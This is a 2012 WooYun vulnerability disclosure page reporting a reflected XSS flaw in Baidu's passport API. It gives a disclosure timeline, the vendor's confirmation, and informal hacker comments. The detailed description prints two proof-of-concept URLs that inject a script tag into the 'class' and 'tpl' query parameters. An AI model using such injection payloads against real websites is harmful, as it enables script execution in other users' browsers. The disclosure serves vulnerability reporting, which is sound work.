当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05077

漏洞标题:百度个人资料XSS

相关厂商:百度

漏洞作者: zeracker

提交时间:2012-03-06 18:39

修复时间:2012-04-20 18:40

公开时间:2012-04-20 18:40

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-03-06: 细节已通知厂商并且等待厂商处理中
2012-03-07: 厂商已经确认,细节仅向厂商公开
2012-03-17: 细节向核心白帽子及相关领域专家公开
2012-03-27: 细节向普通白帽子公开
2012-04-06: 细节向实习白帽子公开
2012-04-20: 细节向公众公开

简要描述:

百度个人资料XSS 。。剑心说过,百度比腾讯安全做的好,所以,XSS无论是反射型,持久性,还是存储型的,都是有价值的。本来还有几个的,被修复了。放着也会发霉,扔出来吧。

详细说明:

https://passport.baidu.com/v2/api/?getapi&class='"><script>alert(301);</script><"&tpl=pp&tangram=false
https://passport.baidu.com/v2/api/?getapi&class=login&tpl='"><script>alert(301);</script><"&tangram=false

漏洞证明:


修复方案:

你懂的。既然安全比腾讯做的好,望高分。

版权声明:转载请注明来源 zeracker@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2012-03-07 11:12

厂商回复:

感谢提交

最新状态:

暂无

漏洞评价:

评论

  1. 2012-03-06 22:13 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    .哪个里面的资料?

  2. 2012-03-06 22:19 | Frankie ( 路人 | Rank:10 漏洞数:1 | 你存在,我的代码里...Line 0://你)

    @zeracker fu*k,在群里就不发2个出来耍耍.

  3. 2012-03-06 22:21 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @Frankie 这个没啥玩的

  4. 2012-03-06 22:22 | Frankie ( 路人 | Rank:10 漏洞数:1 | 你存在,我的代码里...Line 0://你)

    @zeracker 额..那算了睡觉...困...

  5. 2012-03-06 23:05 | 歌颂 ( 实习白帽子 | Rank:36 漏洞数:5 | #1024)

    mark

  6. 2012-03-07 11:24 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    那话真是剑心说的?

  7. 2012-03-07 12:00 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    不是你说的么

  8. 2012-03-07 12:01 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @xsser 不过百度的安全,感觉是比腾讯的好一点点。

  9. 2012-03-07 19:52 | viekst ( 实习白帽子 | Rank:64 漏洞数:11 )

    @xsser 剑心过年回家没? 兄弟们都挺想他的!